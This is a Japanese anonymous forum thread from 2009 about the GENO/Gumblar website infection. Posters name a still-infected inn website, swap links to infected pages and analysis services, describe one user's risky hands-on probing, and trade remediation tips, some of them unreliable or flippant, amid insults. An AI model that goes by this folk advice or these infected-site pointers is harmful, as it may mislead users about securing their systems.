09/05/23 20:53:44
>>240
URLリンク(www.adobe.com)
テスト用のアーカイブ版 Flash Player の提供について
247:名無しさん@お腹いっぱい。
09/05/23 21:00:56
バスター亜種は知らんが対応してます
248:名無しさん@お腹いっぱい。
09/05/23 21:53:21
> Flash Player 2
ここまで来ると逆にFlash Player 1が気になる
249:名無しさん@お腹いっぱい。
09/05/23 22:43:52
解析したいんだが、現在、まだ感染しているページある?
250:名無しさん@お腹いっぱい。
09/05/23 22:46:08
旅館ふくぜんは対応したのかな?
251:名無しさん@お腹いっぱい。
09/05/23 23:08:07
>>250
してない
ブログじゃ感染してるの認識してるっぽいんだがな
252:名無しさん@お腹いっぱい。
09/05/23 23:18:34
いつも当館のブログを閲覧いただきありがとうございます。
自宅のインターネット環境をADSLから遂に光へ変更!!
が、光のスピードでウィルスに感染し泣きそうな担当:福田です。
遂に自宅のネット環境が【光】になる!!
これは、現在とさほど値段が変わらずできることから
妻に了承を得て実現となりました。
URLリンク(fukuzen.seesaa.net)
マジキチ
253:名無しさん@お腹いっぱい。
09/05/23 23:21:54
教えたやれよw
254:名無しさん@お腹いっぱい。
09/05/23 23:26:13
暢気だな・・・。
こうして感染は広がるのか。
255:名無しさん@お腹いっぱい。
09/05/23 23:27:51
やっぱりメディアが事の重大さを伝えるべきなんだ
256:名無しさん@お腹いっぱい。
09/05/23 23:31:42
ふくぜん、重大さを全く分かっとらんなwwww
257:名無しさん@お腹いっぱい。
09/05/23 23:32:26
これまだ出てなかった気がするから一応貼っとく
「感染すると、さまざまな被害に」―最新Webウイルスを徹底解説
URLリンク(itpro.nikkeibp.co.jp)
新しい情報はこのへん
----------------
FTPアカウントを盗み出す対象となるのは、感染パソコンだけではない。
感染パソコンが接続しているネットワーク(サブネット)が対象となる。
ウイルスは、ネットワークを流れるデータを収集するソフトを特定のサイトから
ダウンロードしてインストール。
そのソフトを使ってネットワークを流れるデータを監視し、FTPアカウントと
思われるデータを記録する。
258:名無しさん@お腹いっぱい。
09/05/23 23:32:54
自分のサイトが原因でウイルス入ってるのが気付いてないってこと?
259:名無しさん@お腹いっぱい。
09/05/23 23:33:33
■最大・最後の脆弱性は「人間」
と書いているのは、問い合わせにおもろいメールを返してきたトレンドマイクロなんだけど
252見たらすごく共感した
260:名無しさん@お腹いっぱい。
09/05/23 23:34:27
身内から心無い言葉を浴びせられるのも当然の報いだな・・・ふくぜん・・・。
261:名無しさん@お腹いっぱい。
09/05/23 23:38:07
>>252
感染したことはわかってるけど気にかけてないってことかな
ある意味尊敬するが関わりたくないな
262:名無しさん@お腹いっぱい。
09/05/23 23:40:49
>>253-256,258-260
>>135
263:名無しさん@お腹いっぱい。
09/05/23 23:40:51
ブログから予約のリンクとして貼ってある、YAHOO!トラベルは、「ふくぜん」削除してるな。
264:名無しさん@お腹いっぱい。
09/05/23 23:41:02
こまけぇことはいいんだよぉ!
265:名無しさん@お腹いっぱい。
09/05/23 23:42:36
だれだ、被害者とかいってふくぜんブログにコメントしたのはwww
266:名無しさん@お腹いっぱい。
09/05/23 23:52:22
コメ凸すんなよw
267:名無しさん@お腹いっぱい。
09/05/23 23:55:40
>>257
この手の情報ってどこまで信じていいものやら。
元記事は
URLリンク(www.martinsecurity.net)
だけど、偽アンチウィルス仕込まれたって話は今まで日本では報告されてないんじゃ
ないかな。
ちなみに「FTPアカウントを盗み出す対象となるのは、感染パソコンだけではない」っていうのは
別に新しい情報じゃないよ。sniffingできる範囲なら当然漏れる。
268:名無しさん@お腹いっぱい。
09/05/23 23:58:28
ふくぜんの人気に嫉妬
269:名無しさん@お腹いっぱい。
09/05/24 00:03:45
(TT)
270:名無しさん@お腹いっぱい。
09/05/24 00:06:52
ブログのコメ開放してあるならウイルスの詳細とか色々書いてあげればいいじゃない
271:名無しさん@お腹いっぱい。
09/05/24 00:13:27
いまどきリピータハブなんか残ってないだろ
272:名無しさん@お腹いっぱい。
09/05/24 00:16:03
感染するのが早ければ「FUKUZENウィルス」って名前になったのにな…
273:名無しさん@お腹いっぱい。
09/05/24 00:19:52
何というイメージダウン
274:名無しさん@お腹いっぱい。
09/05/24 00:20:33
VIP辺りに旅館のサイトがウイルス感染認識してるのに放置
とかってスレ立てたら祭りにならないかな
なんてね
275:名無しさん@お腹いっぱい。
09/05/24 00:21:26
昨夜から踏んでるが変化はないぞ。
ふくぜん は。
276:名無しさん@お腹いっぱい。
09/05/24 00:22:55
知らずに放置してるなんかの企業や店の公式HPってどれだけあるんだろうね
―ってほども無いか・・・・
277:名無しさん@お腹いっぱい。
09/05/24 00:23:38
ブログ書いてる暇あるならウィルスの話もたのむよ
278:名無しさん@お腹いっぱい。
09/05/24 00:23:43
>>274
VIPなんかに立ったら
店が潰されてしまうんじゃないか?
279:名無しさん@お腹いっぱい。
09/05/24 00:24:02
>>257の日経の記事が>>267のリンクの記事をほぼ訳して整理しただけってのがちょっと笑える
そういや新聞の日経の経済記事で、「おっ!なかなか鋭い!」って評価が高いやつは、
英フィナンシャルタイムズの社説を三日遅れで訳しただけだったりするのが殆ど。
社の体質なんかもしれんなw
280:名無しさん@お腹いっぱい。
09/05/24 00:33:03
>>274
VIPに期待
281:名無しさん@お腹いっぱい。
09/05/24 00:35:53
どこが最初かわからんけど、
旅行業界で一部感染が広がっていたのかもしれんな。
URLリンク(www.google.com)
282:名無しさん@お腹いっぱい。
09/05/24 00:39:26
Foxit Readerの脆弱性も利用される場合があるようですのでお気をつけて
283:名無しさん@お腹いっぱい。
09/05/24 00:44:30
もう名称 別名ふくぜんウィルスってのを一つ加えてもいいレベルだろw
284:名無しさん@お腹いっぱい。
09/05/24 00:46:16
ふくぜんでググルとちゃんと
このサイトはコンピュータに損害を与える可能性があります。
って注意が出てるwwww
285:名無しさん@お腹いっぱい。
09/05/24 00:49:04
伊香保まで車で30分かからないぜ
今度ふくぜん行ってみようかな
286:名無しさん@お腹いっぱい。
09/05/24 00:51:29
ふくぜんウィルスってほのぼのしてるなw
誰か近くに住んでる奴か暇な奴が遊びがてら行って
何とかしてあげて
287:名無しさん@お腹いっぱい。
09/05/24 00:53:46
コロンブスは既出?
288:名無しさん@お腹いっぱい。
09/05/24 00:54:19
豚インフルじゃないけど
ふくぜんにアクセスしたパソコンは安全が確認されるまで強制隔離なww
289:名無しさん@お腹いっぱい。
09/05/24 00:54:37
「サイト覗いたらウィルスに感染した」ってクレーム入れれば動くかな
290:名無しさん@お腹いっぱい。
09/05/24 00:55:14
これは何かね?食べられるの?
URLリンク(www.value-press.com)
291:名無しさん@お腹いっぱい。
09/05/24 00:58:10
運営で醜態晒してからチェッカーの人見て無いんだけど何処行ったの?
292:名無しさん@お腹いっぱい。
09/05/24 00:59:04
>>291
kwsk
293:名無しさん@お腹いっぱい。
09/05/24 01:00:12
アフィチェッカー?
294:名無しさん@お腹いっぱい。
09/05/24 01:02:16
と思ったらまた湧いてた
スレリンク(operate板)
295:名無しさん@お腹いっぱい。
09/05/24 01:39:15
友達がGENOに感染しててクリーンインストールじゃなくて修復インストールで
直したって聞いたんだけどこの場合ウィルスは完全に駆除されたのかな?
一応、sqlsodbc.chmのファイルサイズとかは正常に戻ったみたいだけど。
296:名無しさん@お腹いっぱい。
09/05/24 01:39:28
>>291
醜態って何よ?
297:名無しさん@お腹いっぱい。
09/05/24 01:50:02
さっきyoutube見てて閉じようと思ったらインターネットブラウザが大量に起動してタブも
大量に開かれたんだけど>>1に書いてある症状とは違う?
298:名無しさん@お腹いっぱい。
09/05/24 01:52:48
>>297
ブラウザの起動なら別の問題です
そもそもyoutubeだけではそういうことは起こらないと思います
299:名無しさん@お腹いっぱい。
09/05/24 01:59:02
>>298
GENOは関係ないですか
一応Aviraで検索していますがウィルスの他の可能性は
あるのでしょうか?
300:名無しさん@お腹いっぱい。
09/05/24 02:02:30
知 る か
301:名無しさん@お腹いっぱい。
09/05/24 02:04:30
Janeを変な立ち上げ方したら
エラー画面が次々出てJaneを閉じれなくなって
にっちもさっちもいかなくなって電源落として終了させてから
電源入れ直したら、BIOSでパスワードかけてたのにも関わらず
メーカーロゴの後そのままwinが立ち上がって来るようになった
302:名無しさん@お腹いっぱい。
09/05/24 02:08:00
もっと相応しいスレがあるからそっち行ったほうがいいと思うぞw
303:名無しさん@お腹いっぱい。
09/05/24 02:16:18
>>87は安全だね
危ないのは
URLリンク(www.fukuzen.com)
絶対開かないでね。
googleタンは「このサイトはコンピュータに損害を与える可能性があります」
と出ますがウイルスバスターのTrendプロテクトは安全だと言い張ってますw
304:名無しさん@お腹いっぱい。
09/05/24 02:19:30
絶対開かないで言うならアドレスそのまま張るなよボケ
しかしバスター使えねーな
305:名無しさん@お腹いっぱい。
09/05/24 02:25:38
>>304
Adobe Flash Player の最新版にアップデート
Adobe Acrobat Reader の最新版にアップデート
上記をしてるのであえて踏んでみたが感染はしてないようだ。
306:名無しさん@お腹いっぱい。
09/05/24 02:28:57
>>299
他の何かである可能性はあるけどGenoとは違いそうです
スキャンしてるならおとなしくそれを待てば良いとおもいます
youtube以外にもいきましたよね
リンクは貼らなくて良いです
307:名無しさん@お腹いっぱい。
09/05/24 02:29:59
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
流石Sophosさん恥ずかしい勝利宣言しただけのことはあるな
308:名無しさん@お腹いっぱい。
09/05/24 02:35:25
>>303
そこも無害じゃね?
ソース見ても何もなさそうだが
309:名無しさん@お腹いっぱい。
09/05/24 02:38:41
もしや解決したんじゃね?
310:名無しさん@お腹いっぱい。
09/05/24 02:40:23
なわけないだろ
311:名無しさん@お腹いっぱい。
09/05/24 02:41:00
>>308
ソース見たら真っ黒なんすけど
312:名無しさん@お腹いっぱい。
09/05/24 02:41:38
少なくとも22日付けのwepawet先生は激怒しておられる
URLリンク(wepawet.iseclab.org)
313:名無しさん@お腹いっぱい。
09/05/24 02:42:04
googleで開いたらこの始末(IE8)
警告- このウェブサイトにアクセスすると、コンピュータに損害が生じる可能性があります。
検索のヒント:
前のページに戻って、他の検索結果を選んでください。
別のキーワードで検索してみてください。
または、ご自身の責任のもとで URLリンク(www.fukuzen.com) にアクセスできます。見つかった問題の詳細については、Google が提供するこのサイトのセーフ ブラウジング診断ページをご覧ください。
不正なオンライン ソフトウェアから保護する方法については、StopBadware.org をご覧ください。
サイトの管理者である場合は、Google のウェブマスター ツールを使用して、サイトの再審査を依頼できます。審査プロセスの詳細については、Google のウェブマスター ヘルプ センターをご覧ください。
Advisory provided by
314:308
09/05/24 02:43:21
あれ?
ダウンロードしたのなぜか問題なかったけど
感染してるね
315:305
09/05/24 02:45:53
アドレスに貼り付けて開いた俺はもしかして・・・感染した?
316:308
09/05/24 02:48:23
XPでダウンロードしたら感染部分もダウンロードできたけど
Vistaだと問題の部分だけないのがダウンロードできるな
317:名無しさん@お腹いっぱい。
09/05/24 02:48:38
>>305
いや感染していない
318:名無しさん@お腹いっぱい。
09/05/24 02:49:34
>>315
分からないのに何でそんなことするんだよ・・・
martuz死んでるから感染して無いよ
319:名無しさん@お腹いっぱい。
09/05/24 02:50:28
FUKUZENウィルス怖いれす
320:名無しさん@お腹いっぱい。
09/05/24 02:51:17
FUKUZENとして認知されたのか~??? やるね
321:305
09/05/24 02:52:33
>>317
>>318
無茶して・馬鹿だね俺。
でも感染してないようで良かった㌧
安心してこれで寝られます。
322:名無しさん@お腹いっぱい。
09/05/24 02:52:46
C&C用の鯖は両方生きてるな
これから何かしてくれるのかな
323:名無しさん@お腹いっぱい。
09/05/24 02:54:04
URLリンク(mat.blogdns.com)
URLリンク(mat.blogdns.com)
URLリンク(mat.blogdns.com)
URLリンク(mat.blogdns.com)
URLリンク(mat.blogdns.com)
URLリンク(mat.blogdns.com)
URLリンク(mat.blogdns.com)
URLリンク(mat.blogdns.com)
324:名無しさん@お腹いっぱい。
09/05/24 02:55:10
今現在はノーガードでもGENOに関しては感染しないよ
一時間後は知らんけど
>>323
グロ注意
たいしたことないけどw
325:名無しさん@お腹いっぱい。
09/05/24 03:01:50
本当に大した事ないグロでがっくりした
326:名無しさん@お腹いっぱい。
09/05/24 03:05:14
rottenでも行ってこいよ
そして戻ってくるな
327:名無しさん@お腹いっぱい。
09/05/24 03:07:29
URLリンク(www.bianchi-inuyama.com)
↑
このサイト異常に重いんですが、GENOに感染してますか?
328:名無しさん@お腹いっぱい。
09/05/24 03:10:06
知るかヴォケ
329:名無しさん@お腹いっぱい。
09/05/24 03:19:14
グロスレ住民の俺の専ブラはその画像は激しく既出だとおっしゃっています。
330:名無しさん@お腹いっぱい。
09/05/24 03:19:54
>>327
>>1
331:名無しさん@お腹いっぱい。
09/05/24 03:20:01
_,,,
_/::o・ァ しらんがな
∈ミ;;;ノ,ノ
332:名無しさん@お腹いっぱい。
09/05/24 03:22:57
adobe導入してなくても感染しますか?
333:名無しさん@お腹いっぱい。
09/05/24 03:24:53
確認するならレジストリ見るのが確実だけど
DaonolFix使ってもいいんじゃないの
334:名無しさん@お腹いっぱい。
09/05/24 03:39:03
テンプレにある確認方法試したら大丈夫でした
adobeはサイズが大きいのでfoxitを使ってますが
感染する可能性はありますか?
初心者質問ですみません。
335:名無しさん@お腹いっぱい。
09/05/24 03:41:07
adobe消しとけばおk
336:名無しさん@お腹いっぱい。
09/05/24 03:43:35
ありがとうございます。
安心して得ろサイトをパトロール出来ます。
337:名無しさん@お腹いっぱい。
09/05/24 03:55:10
ageには注意
338:名無しさん@お腹いっぱい。
09/05/24 04:10:16
ふくぜんから目が離せない
339:名無しさん@お腹いっぱい。
09/05/24 04:13:16
>>336
FoxItも脆弱性があったから、最新版にしておけ。
340:名無しさん@お腹いっぱい。
09/05/24 04:19:11
>>323が俺が見てるスレにも張られてて
それに対して「これグロ+GENOウィルスだよ」ってレスがついてたんだが本当なのかな
もうgumblar.cn消えてるらしいしどうでもいいんだろうけど専ブラ使ってないと死んでたのか気になる
一応言っとくと俺が323張ったんじゃないからね
341:名無しさん@お腹いっぱい。
09/05/24 04:20:43
テンプレ戻ってて安心した
342:名無しさん@お腹いっぱい。
09/05/24 04:21:37
>>339
忠告ありがとうございます。
早速そうします。
343:名無しさん@お腹いっぱい。
09/05/24 04:27:49
アフィのテンプレよりは遥かにいいけど
このテンプレも情報古いし適当だよな
344:名無しさん@お腹いっぱい。
09/05/24 04:30:34
>>343
お前みたいな文句いうだけのカスが一番存在価値ないけどな
345:名無しさん@お腹いっぱい。
09/05/24 04:34:34
>>344
早いが、次スレ>>1決定でいいな?
346:名無しさん@お腹いっぱい。
09/05/24 04:36:30
馬鹿にスイッチ入ったか
347:名無しさん@お腹いっぱい。
09/05/24 04:36:57
やっぱり、Vistaにかえた方が無難なんだろうか・・・
XPにfirefox(noscript導入済)、ノートン先生、PG2でかろうじて凌いでるけど
ネットに依存しているタイプだから活動スペースがかなり限定されてしまって毎日ストレスがorz
ほとんどのサイトがJS使ってるから色々つらい
348:名無しさん@お腹いっぱい。
09/05/24 04:37:58
>>347
JSめんどいなら一時的に許可しまくればいいじゃない
349:名無しさん@お腹いっぱい。
09/05/24 04:39:32
>>347
お前ネットやるには向いていないぞ
350:名無しさん@お腹いっぱい。
09/05/24 04:41:23
まとめWikiを取っ払ってまでチェッカーを1に書いた奴のせいで反感を買う
351:名無しさん@お腹いっぱい。
09/05/24 04:44:12
>>348
それが出来れば楽なんですけどね・・・
感染を防ぐためにこんな縛りを強いてるわけでして
長い間、再セットアップしてないからそろそろバックアップを取って事前準備をしておいた方がいい時期なのかも
>>349
向いてないのは否めないですが、ネット歴は一応は10年(ただし、情報弱者)だから
すっかり依存しきってますよ
352:名無しさん@お腹いっぱい。
09/05/24 04:45:43
>>347
このウィルスがなければ普通にネットサーフィンしてたのかい
353:名無しさん@お腹いっぱい。
09/05/24 04:47:01
ソース見てなにもなければ一時許可してるんだけどそれはまた違うの?
354:名無しさん@お腹いっぱい。
09/05/24 04:50:33
今の所はアドビ製品のjsの項目オフにしてりゃいい話じゃない...か
355:名無しさん@お腹いっぱい。
09/05/24 04:51:04
>>340
俺は情弱だからよくわからんけど、このURLは踏んだ事があると専ブラが言っている。
いつごろ見たかよく覚えてないが、すくなくともGENO騒ぎが起きるよりは前。
アドレスを変えずに画像だけ差し替えたのならわからんが、そうじゃないなら
この騒動が起こる前からGENOが仕込まれていたか、340が騙されたかのどっちかだ。
356:名無しさん@お腹いっぱい。
09/05/24 04:53:30
>>354
ブラウザのオフでも効果あるでしょ
もちろんこれ以外にも有効だからそうしてるんでしょ
357:名無しさん@お腹いっぱい。
09/05/24 04:54:44
GENOはまた店の名前変えたら幸せになれる
358:名無しさん@お腹いっぱい。
09/05/24 04:55:35
まー、Adobe Readerは必要な人が多いんじゃないか
他にPDFを扱える似たようなものがあるにしても使い勝手も違うだろうし
私は潔くアンインストールしたけど
Flashはネットをやっている以上はさすがに必要
359:名無しさん@お腹いっぱい。
09/05/24 04:56:42
もう解決したね
次スレいらないね
360:名無しさん@お腹いっぱい。
09/05/24 04:57:19
他のソフトに慣れればいい
361:名無しさん@お腹いっぱい。
09/05/24 05:00:21
Win2k、IE6のセキュリティ中低、FlashPlayer9.0.159.0、AcrobatReader5.0の俺が感染していないですよ
362:名無しさん@お腹いっぱい。
09/05/24 05:03:15
AVAST入れてたもんで勝手に遮断してくれてた
これ騒ぎになってないときだったから何も知らなかったわ
363:名無しさん@お腹いっぱい。
09/05/24 05:14:16
>>361
気づいてないだけだろw
364:名無しさん@お腹いっぱい。
09/05/24 05:17:04
小林製薬とmaidoさん以外でウィルスについて報告したサイトはある?
365:名無しさん@お腹いっぱい。
09/05/24 05:26:24
maidoって?
366:名無しさん@お腹いっぱい。
09/05/24 05:27:51
maidoだけで分かる前提で書き込むとかウザイわ・・・
367:名無しさん@お腹いっぱい。
09/05/24 05:32:45
maido3じゃん。普通に。
368:名無しさん@お腹いっぱい。
09/05/24 05:36:19
>>363
それが感染していないんだよね。何でかは知らんがマジでw
369:名無しさん@お腹いっぱい。
09/05/24 05:38:05
>>368
亜種はcmd.exe、regedit.exeも起動するよ...
370:名無しさん@お腹いっぱい。
09/05/24 05:39:13
>>368
お気に入りサイトが感染していないんだろ
運がいい
371:名無しさん@お腹いっぱい。
09/05/24 05:39:26
大事な所でタイポすんなや解りづらい
372:名無しさん@お腹いっぱい。
09/05/24 06:24:08
やばい終わった
373:名無しさん@お腹いっぱい。
09/05/24 06:24:51
やばいどうしようどうすればいいんだ助けてくれ
374:名無しさん@お腹いっぱい。
09/05/24 06:25:26
てか駆除できないってのが信じられないんだけど、
再起動とか何かEXEを消すとかサービスを止めればいいんじゃねーの?
375:名無しさん@お腹いっぱい。
09/05/24 06:32:45
>>369 >>370
一週間ほど入院していてGENOウイルスの事知らなかったんすよ
お気に入りに入れておいたサイトが結構404で何でかな?っと知り合いにメールしたらこのスレ教わったっす
カスペルスキーのオンラインでJAVAが必要なのか・・・めんどくせ
376:名無しさん@お腹いっぱい。
09/05/24 06:34:26
>>374
駆除はできるよ。全亜種の駆除ができるかはわからんけど。
ただ、駆除してもchmファイルは書き換えられたままだし、クリーンなものに
差し替える必要がある。
他にも書き換えられるシステムファイルがあるかもしれない。
クリーンなシステムファイルを書き戻す方法はSymantecのサイトに書かれているけど、
クリーンインストールしてしまった方が安心できる。
377:名無しさん@お腹いっぱい。
09/05/24 06:38:06
>>376
もちろんクリーンが安定なのは承知の上です。
ただ.chmなんてヘルプファイルだし、もしこれがおかしいとヤバイってんなら、
これはMS04-023/MS05-026あたりの全然違う脆弱性でしょ。
それならAdobeには罪はないですし、WinXP SP3なら感染はしません。
まあ.chmならIEの脆弱性を突かれてる可能性もあるけど。
378:名無しさん@お腹いっぱい。
09/05/24 06:39:32
ああ、ここIDが出ないのね。オレは>>377=>>374です。
379:名無しさん@お腹いっぱい。
09/05/24 06:40:21
>>377
勘違いしているね
380:374
09/05/24 06:48:38
ふっるいFlashしか入ってないVirtualPCでふくぜんを開いたら
「Flashをインストールしますか?」だってorz
そこでインストールしたら最新版が入っちゃうじゃんかよ。
WireSharkによると確かに全然関係ないところからjquery_utf8.jsってのを
落とそうとしてるから、何かしようとしてるのは間違いないな。もう少し調べるわ。
381:名無しさん@お腹いっぱい。
09/05/24 06:54:31
>>377
URLリンク(www.symantec.com)
ヘルプファイルなんかは別に放置してもいいが、他のファイルが書き換えられる可能性が
あるから、駆除手順として「Windows ファイルを抽出して修復」が上がっているんだと
思うんだが。
ま、他に何も書き換えられていないと自分で判断できるならそのままでいいよ。
382:名無しさん@お腹いっぱい。
09/05/24 07:00:28
>>377
Genoに利用されているAdobeの脆弱性がどんなもので、それを突かれた場合、
どういうことが可能なのか調べてみな。
383:374
09/05/24 07:07:34
>>382
一応そいつは調べた。今のところPDFとSWFを最初の突破口にされるのは間違いない。
おそらくふくぜんの場合はSWFを狙ってる。
ただ今Adobeに行くと最新のFlash10しか落とせない(そりゃそうだわな)。古いFlashが
残ってるPCを調達しなきゃいかんのかな。
「既に感染してるVirtualPC」ってのを作って解析したいんだがな・・・
384:名無しさん@お腹いっぱい。
09/05/24 07:10:04
チャレンジャーあらわるあらわる
385:名無しさん@お腹いっぱい。
09/05/24 07:11:24
>>383
好きなのでテストしてくれ
URLリンク(www.adobe.com)
386:名無しさん@お腹いっぱい。
09/05/24 07:21:53
>>383
調べたのにどうして
> ただ.chmなんてヘルプファイルだし、もしこれがおかしいとヤバイってんなら、
> これはMS04-023/MS05-026あたりの全然違う脆弱性でしょ。
なんてことになるの?
もうやめた方がいいと思うよ。
今はウィルス本体が落ちてこないからいいが、その程度の理解じゃケガするよ。
387:名無しさん@お腹いっぱい。
09/05/24 07:24:47
まあ、釣りだろうね
388:374
09/05/24 07:25:13
>>386
オレが知りたいのは既に感染してしまった場合駆除
できないかどうかだから、たとえばHKEY_LOCAL_MACHIN\~\Runに
何か仕掛けるのかとかそういうことを調べたかったんだよ。
なんだウィルス本体はもう消えてるのか? それじゃ意味ないな。
>>385ありがとう。ふくぜんの結果は報告する。
389:374
09/05/24 07:25:46
すまん。MACHIN\じゃなかったMACHINE\だ。
390:名無しさん@お腹いっぱい。
09/05/24 07:27:26
>>388
おーがんばってくれ
インストールはどうやるんですかなんて聞くなよ
391:名無しさん@お腹いっぱい。
09/05/24 07:29:15
朝から糞ワラタ
お前が調べるとか冗談だろ
392:名無しさん@お腹いっぱい。
09/05/24 07:32:56
>>388
感染させたいなら検出可否報告スレに上がってる検体を実行しろよ。
やめた方がいいと思うけどね。
VMに感染させた場合、無防備だとホストOSも平文パスワードを抜かれるぞ。
393:374
09/05/24 07:37:53
ああトラフィックを見て送るってヤツだろ。
まあここまで情報が出てない以上誰にもわかんないんだろうな。
煽られてもしょうがない。
しかし感染した人にクリーンしろってのはちょっと酷だから
何とか止められないもんかという、それだけなんだよ。
しかしおかしいな。確かに9r16ってのが入ったが、バージョン確認でも出てこない。
394:名無しさん@お腹いっぱい。
09/05/24 07:40:17
>>380
> WireSharkによると確かに全然関係ないところからjquery_utf8.jsってのを
Wiresharkの使い方もわかってないだろ。
jQueryはルートのScriptフォルダから落ちてくるし、それはWebデザイナーの
設計通りの動作だ。
中身はGENOが追加されているけど。
395:名無しさん@お腹いっぱい。
09/05/24 07:47:36
一般の人が感染したならクリーンインストールしたほうが何かと安全じゃないすか?
大切なものはバックアップとっておけばいいし、そんなに面倒でもないし・・・
いや、面倒か?
396:名無しさん@お腹いっぱい。
09/05/24 07:54:09
>>393
こことネ板の過去ログ読んだ?
情報が出てないんじゃなくて理解できてないだけだろ?
397:名無しさん@お腹いっぱい。
09/05/24 07:56:00
パーティションでシステムとデータを分けた環境ならリカバリーが30分で済むし楽
398:名無しさん@お腹いっぱい。
09/05/24 07:56:20
Nyftyでスキャンしてみたが
見つかったウイルス:9
感染したアイテム:8 / 0 スキャンしたファイル:21926
疑わしいアイテム:2 スキャンプロセスの経過時間:00:42:00
リカバリしてきまっす
399:名無しさん@お腹いっぱい。
09/05/24 08:05:34
>>397
常にバックアップをしていれば(ry
400:名無しさん@お腹いっぱい。
09/05/24 08:38:03
>>393
>まあここまで情報が出てない以上誰にもわかんないんだろうな
今頃出てきて何言ってんだwww
散々検証が繰り返されて情報も対応策も出切ってるよ
そのおかげで初心者の間でプチパニックになってたのもやっとおさまって
ぼちぼち落着きを取り戻し始めたところなのに空気読めてなさすぎ
つーか今までの流れすらちゃんと読んでもいないくせに
俺がなんとかしてやる的な思い込みしてるところが勘違いも甚だしい
401:名無しさん@お腹いっぱい。
09/05/24 09:01:41
URLリンク(www.so-net.ne.jp)
感染サイト一覧
402:名無しさん@お腹いっぱい。
09/05/24 09:16:47
GENOウイルスの亜種は今後も出てきて難読化も進むだろうが
「JavaScript+既知のAdobe脆弱性」の感染手法が変わらない限り
基本対策をしっかりしてれば仮に検出できなくても感染しないから関係ない
逆に、既に感染した奴がOSクリーンインストールするのは常識中の常識
仕込まれたファイルが検出可能な周知のコードパーツだけとは限らないからな
そんなことも理解できない馬鹿は窓からPC投げ捨てて回線切って首吊っとけ
403:名無しさん@お腹いっぱい。
09/05/24 09:44:04
騒ぎすぎだよ大したことないだろ
店名晒して逆に営業妨害で訴えられたらどうするの?
404:名無しさん@お腹いっぱい。
09/05/24 09:48:04
じゃあ各ニュースサイトもGENOウイルスの名前出してるから訴えられそうだな
405:名無しさん@お腹いっぱい。
09/05/24 09:53:46
いやー久々に面白いおばかちゃんを見たなw
406:名無しさん@お腹いっぱい。
09/05/24 10:52:42
ポート445を閉じたらネットに繋がらなくなったんだが…
407:名無しさん@お腹いっぱい。
09/05/24 11:04:05
>>406
DHCP使わなきゃいいだろ
408:名無しさん@お腹いっぱい。
09/05/24 11:27:31
>>406
書き込みは出来るんだねw
409:名無しさん@お腹いっぱい。
09/05/24 11:29:17
2ちゃんくらいなら携帯でもできますけど
410:名無しさん@お腹いっぱい。
09/05/24 11:50:17
再度ポートを開いたってことも
411:名無しさん@お腹いっぱい。
09/05/24 11:50:28
セキュリティパッチ当てているので今まで軽く流してきたんだけど、
いまさらだけど、FTPのパスワードを盗むってのに興味を引いた。
GENOウイルス感染後の話ではなく、GENOに限らず感染前のサーバー管理者向けの一般的な話として、
FTPを使わずにSFTPを使うって話があまり話題になっていないみたい。
このウイルスはなぜFTPパスワードを抜けるのか?それはFTPプロトコルが暗号化されていないから。
FTPプロトコルを使うことは本質的に危険。同じ理由で暗号化されていないTELNETを使うのも危険。
なのでTELNETの代わりにSSH、FTPの代わりにSFTPを使いましょう。
SSHは普通はどのサーバーでも対応しているはず。またFTPはSSHを解して通信を行うため
SSHが使えるサーバーならSFTPも使えるはず。だからサーバー側のファイアウォールでFTPを許可する必要すら無い。
クライアントソフトとしてはFileZillaがSFTPに対応している。俺のお勧め。
日本ではFFFTPが人気があるみたいだけど、SFTPには直接対応していないみたい。
でもちゃんと設定すればFFFTPでもSFTPを使えるのでどうしてもFFFTPを使いたい人は調べてほしい。
412:名無しさん@お腹いっぱい。
09/05/24 11:56:05
sshやsftp使うのはサイト管理してる人にとっては常識でしょ。
秘密鍵認証のみにしてポートも変えておけばかなり安全。
413:名無しさん@お腹いっぱい。
09/05/24 11:57:22
人に意味不明なメール送りつけたりきもい
ウイルスなんてずっと騒いでるのお前らだけだから。
これだからオタクは嫌われるんだよ・・・こわい
414:名無しさん@お腹いっぱい。
09/05/24 11:58:11
>>412
いやいや、その常識に反してFTPを使っているから
このように感染拡大しているわけで。
日本では(なぜか)人気のFFFTPがSFTPに対応してないみたいだしさ。
どうもSSHにくらべてSFTPに知名度が低い気がするのよ。
415:名無しさん@お腹いっぱい。
09/05/24 11:59:13
世の中バカが多いし、sshが使えないレンタルサーバもかなりあるんでない?
416:名無しさん@お腹いっぱい。
09/05/24 11:59:47
>>413
えっ
417:名無しさん@お腹いっぱい。
09/05/24 12:02:25
>>413
えっなにそれこわい
418:名無しさん@お腹いっぱい。
09/05/24 12:08:12
>>413
で、感染したらまっさきに泣き付きにくるんですね
419:名無しさん@お腹いっぱい。
09/05/24 12:11:25
企業向けや玄人向けのレンタルサーバならSFTPやFTPSに対応してるはずだが、
証明書の用意が面倒なんで素人向けのカンタン激安系サーバは対応してないかもな。
420:名無しさん@お腹いっぱい。
09/05/24 12:12:00
感染してるどっかのサイトの管理人さんかな
421:名無しさん@お腹いっぱい。
09/05/24 12:13:01
バスターってもう対策してるんだよね?
422:名無しさん@お腹いっぱい。
09/05/24 12:18:09
>>416417
判で押したように同じ反応してる方が怖いから
どうせ2ちゃんに洗脳されちゃったんだろ?
仮にどこかのサイトが感染してお前らに何の関係があるの?
お前らがなんとかしてやれるの?意味不明な長文メール何通も
送られてもただのスパムと同じだろ
これだからパソコンオタクはきもいんだよ
423:名無しさん@お腹いっぱい。
09/05/24 12:19:31
>>422
感染しちゃったの?
どうでもいいなら放っておけばいいんじゃないの
そのうち誰からも相手にされなくなってちょうど良くなるからなw
424:名無しさん@お腹いっぱい。
09/05/24 12:19:37
>>406
おいらは全部のポートを閉じてネットしてるよ
これセキュ板住人の常識な
425:名無しさん@お腹いっぱい。
09/05/24 12:20:33
>>422
伊香保温泉の中の人?
なら、とっとと対策を講じろよ。
426:名無しさん@お腹いっぱい。
09/05/24 12:23:57
>>424
どうゆうこと?
427:名無しさん@お腹いっぱい。
09/05/24 12:24:15
>>422
君らにとっては意味不明な事象なんだろうね 知らないうちに人に迷惑かけてることを思ってください
428:名無しさん@お腹いっぱい。
09/05/24 12:26:15
>>422
きもいならここに来なきゃいいのに・・
429:名無しさん@お腹いっぱい。
09/05/24 12:26:16
とりあえず意味不明な長文メールとやらを晒してからだな
誰にとっても意味不明なのか、それとも読んでる方がバカなだけなのか
430:名無しさん@お腹いっぱい。
09/05/24 12:26:25
家に泥棒が毎日入ってるのを気付かないから教えてあげたら
